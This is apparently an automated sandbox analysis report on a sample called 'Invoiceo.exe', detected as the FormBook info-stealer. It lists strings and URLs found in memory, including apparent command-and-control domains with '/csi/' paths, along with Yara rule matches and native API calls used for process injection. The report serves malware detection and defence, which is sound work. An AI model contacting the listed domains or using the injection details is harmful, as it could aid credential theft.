Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.analistaweb.netReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bahama-id.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bahama-id.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bahama-id.com/csi/www.uspaypausa.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bahama-id.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bermudesfcrasettlement.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bermudesfcrasettlement.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bermudesfcrasettlement.com/csi/www.salonandspaexperts.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bermudesfcrasettlement.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bioshope.online
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bioshope.online/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bioshope.online/csi/www.wristaidmd.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.bioshope.onlineReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.foodbyroyalbites.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.foodbyroyalbites.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.foodbyroyalbites.com/csi/www.bioshope.online
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.foodbyroyalbites.comReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kontrey.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kontrey.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kontrey.com/csi/www.bahama-id.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.kontrey.comReferer:
Source: powershell.exe, 00000004.00000003.348127191.00000000090A2000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.co
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.naturaldesiproducts.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.naturaldesiproducts.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.naturaldesiproducts.com/csi/M
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.naturaldesiproducts.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.nelivo.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.nelivo.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.nelivo.com/csi/www.adtlive.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.nelivo.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.rare-snare.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.rare-snare.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.rare-snare.com/csi/www.analistaweb.net
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.rare-snare.comReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.salonandspaexperts.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.salonandspaexperts.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.salonandspaexperts.com/csi/www.foodbyroyalbites.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.salonandspaexperts.comReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ss01center.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ss01center.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ss01center.com/csi/www.naturaldesiproducts.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.ss01center.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.swim-maki.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.swim-maki.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.swim-maki.com/csi/www.bermudesfcrasettlement.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.swim-maki.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tabuk24.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tabuk24.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tabuk24.com/csi/www.swim-maki.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.tabuk24.comReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.uspaypausa.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.uspaypausa.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.uspaypausa.com/csi/www.ss01center.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.uspaypausa.comReferer:
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.wristaidmd.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.wristaidmd.com/csi/
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.wristaidmd.com/csi/www.nelivo.com
Source: explorer.exe, 0000000D.00000002.500356257.00000000056A1000.00000004.00000001.sdmp	String found in binary or memory: http://www.wristaidmd.comReferer:
Source: explorer.exe, 0000000D.00000000.279217207.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Invoiceo.exe	String found in binary or memory: https://github.com/unguest
Source: Invoiceo.exe	String found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
Source: powershell.exe, 00000004.00000003.320382870.0000000004F91000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.325533885.0000000005112000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.333217488.00000000052FC000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Invoiceo.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.Invoiceo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Invoiceo.exe.37e7df0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Invoiceo.exe

Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419D50 NtCreateFile,	11_2_00419D50
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419E00 NtReadFile,	11_2_00419E00
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419E80 NtClose,	11_2_00419E80
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419F30 NtAllocateVirtualMemory,	11_2_00419F30
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419D4C NtCreateFile,	11_2_00419D4C
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419DFA NtReadFile,	11_2_00419DFA
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419E7A NtClose,	11_2_00419E7A
Source: C:\Users\user\Desktop\Invoiceo.exe	Code function: 11_2_00419F2A NtAllocateVirtualMemory,	11_2_00419F2A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,	26_2_0033B42E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003384BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	26_2_003384BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003358A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	26_2_003358A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033B4F8 NtQueryInformationToken,NtQueryInformationToken,	26_2_0033B4F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033B4C0 NtQueryInformationToken,	26_2_0033B4C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00356D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	26_2_00356D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0035B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	26_2_0035B5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_00359AB4 NtSetInformationFile,	26_2_00359AB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003383F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	26_2_003383F2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9710 NtQueryInformationToken,LdrInitializeThunk,	26_2_033D9710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9780 NtMapViewOfSection,LdrInitializeThunk,	26_2_033D9780
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9FE0 NtCreateMutant,LdrInitializeThunk,	26_2_033D9FE0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9A50 NtCreateFile,LdrInitializeThunk,	26_2_033D9A50
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	26_2_033D96E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D96D0 NtCreateKey,LdrInitializeThunk,	26_2_033D96D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	26_2_033D9910
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9540 NtReadFile,LdrInitializeThunk,	26_2_033D9540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D99A0 NtCreateSection,LdrInitializeThunk,	26_2_033D99A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D95D0 NtClose,LdrInitializeThunk,	26_2_033D95D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9860 NtQuerySystemInformation,LdrInitializeThunk,	26_2_033D9860
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9840 NtDelayExecution,LdrInitializeThunk,	26_2_033D9840
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CE730 NtQueryInformationProcess,	26_2_033CE730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399335 NtClose,NtClose,	26_2_03399335
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9730 NtQueryVirtualMemory,	26_2_033D9730
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417365 NtQuerySystemInformation,	26_2_03417365
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345FF69 NtQueryVirtualMemory,	26_2_0345FF69
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033DA710 NtOpenProcessToken,	26_2_033DA710
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342176C NtWaitForSingleObject,NtClose,	26_2_0342176C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9B00 NtSetValueKey,	26_2_033D9B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9770 NtSetInformationFile,	26_2_033D9770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033DA770 NtOpenThread,	26_2_033DA770
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9760 NtOpenProcess,	26_2_033D9760
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D7742 NtAllocateVirtualMemory,	26_2_033D7742
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339A7B0 NtClose,NtClose,	26_2_0339A7B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033DA3B0 NtGetContextThread,	26_2_033DA3B0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345F7DD NtFreeVirtualMemory,	26_2_0345F7DD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345AFDE NtFreeVirtualMemory,	26_2_0345AFDE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D97A0 NtUnmapViewOfSection,	26_2_033D97A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03446BEA NtQueryVirtualMemory,	26_2_03446BEA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A8F87 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_033A8F87
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0341FB88 NtProtectVirtualMemory,	26_2_0341FB88
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03465BA5 NtQueryInformationToken,	26_2_03465BA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339F7C0 NtClose,	26_2_0339F7C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421242 NtUnmapViewOfSection,NtClose,NtClose,NtClose,NtClose,NtClose,	26_2_03421242
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339E620 NtClose,	26_2_0339E620
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9A20 NtResumeThread,	26_2_033D9A20
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D2E1C NtDelayExecution,	26_2_033D2E1C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03417E63 NtProtectVirtualMemory,	26_2_03417E63
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9610 NtEnumerateValueKey,	26_2_033D9610
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9A10 NtQuerySection,	26_2_033D9A10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339C600 NtQueryValueKey,NtQueryValueKey,	26_2_0339C600
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9A00 NtProtectVirtualMemory,	26_2_033D9A00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345F209 NtFreeVirtualMemory,NtFreeVirtualMemory,	26_2_0345F209
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9670 NtQueryInformationProcess,	26_2_033D9670
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9660 NtAllocateVirtualMemory,	26_2_033D9660
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CBE62 NtProtectVirtualMemory,	26_2_033CBE62
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345EE22 NtFreeVirtualMemory,	26_2_0345EE22
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9650 NtQueryValueKey,	26_2_033D9650
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03399240 NtClose,NtClose,	26_2_03399240
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421AD6 NtFreeVirtualMemory,	26_2_03421AD6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033952A5 NtClose,NtClose,NtClose,NtClose,	26_2_033952A5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392E9F NtClose,	26_2_03392E9F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CD294 NtClose,	26_2_033CD294
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9A80 NtOpenDirectoryObject,	26_2_033D9A80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344BE9B NtAllocateVirtualMemory,	26_2_0344BE9B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03460EA5 NtQueryVirtualMemory,	26_2_03460EA5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03413540 NtQueryValueKey,NtClose,	26_2_03413540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033A9136 NtProtectVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_033A9136
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033DAD30 NtSetContextThread,	26_2_033DAD30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CC532 NtProtectVirtualMemory,	26_2_033CC532
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03461D55 NtFreeVirtualMemory,	26_2_03461D55
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B4120 NtClose,	26_2_033B4120
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9520 NtWaitForSingleObject,	26_2_033D9520
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421570 NtQuerySystemInformation,NtClose,	26_2_03421570
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9560 NtWriteFile,	26_2_033D9560
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344FD22 NtQueryInformationProcess,	26_2_0344FD22
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9950 NtQueueApcThread,	26_2_033D9950
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033C0548 NtQueryVirtualMemory,	26_2_033C0548
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_034219C8 NtCreateSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	26_2_034219C8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03392D8A NtWaitForSingleObject,	26_2_03392D8A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033ADD80 NtQueryVirtualMemory,	26_2_033ADD80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0344BDFA NtAllocateVirtualMemory,	26_2_0344BDFA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D95F0 NtQueryInformationFile,	26_2_033D95F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D99D0 NtCreateProcessEx,	26_2_033D99D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421C49 NtQueryInformationProcess,	26_2_03421C49
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342C450 NtAdjustPrivilegesToken,NtClose,NtClose,	26_2_0342C450
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D9820 NtEnumerateKey,	26_2_033D9820
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421C76 NtQueryInformationProcess,	26_2_03421C76
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_03421879 NtAllocateVirtualMemory,	26_2_03421879
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033B746D NtClose,	26_2_033B746D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033DB040 NtSuspendThread,	26_2_033DB040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0345F8C5 NtFreeVirtualMemory,	26_2_0345F8C5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033CF0BF NtClose,NtClose,	26_2_033CF0BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0342B8D0 NtAdjustPrivilegesToken,NtAdjustPrivilegesToken,NtClose,NtClose,	26_2_0342B8D0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_033D98A0 NtWriteVirtualMemory,	26_2_033D98A0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0339DCA4 NtEnumerateKey,NtClose,NtClose,	26_2_0339DCA4
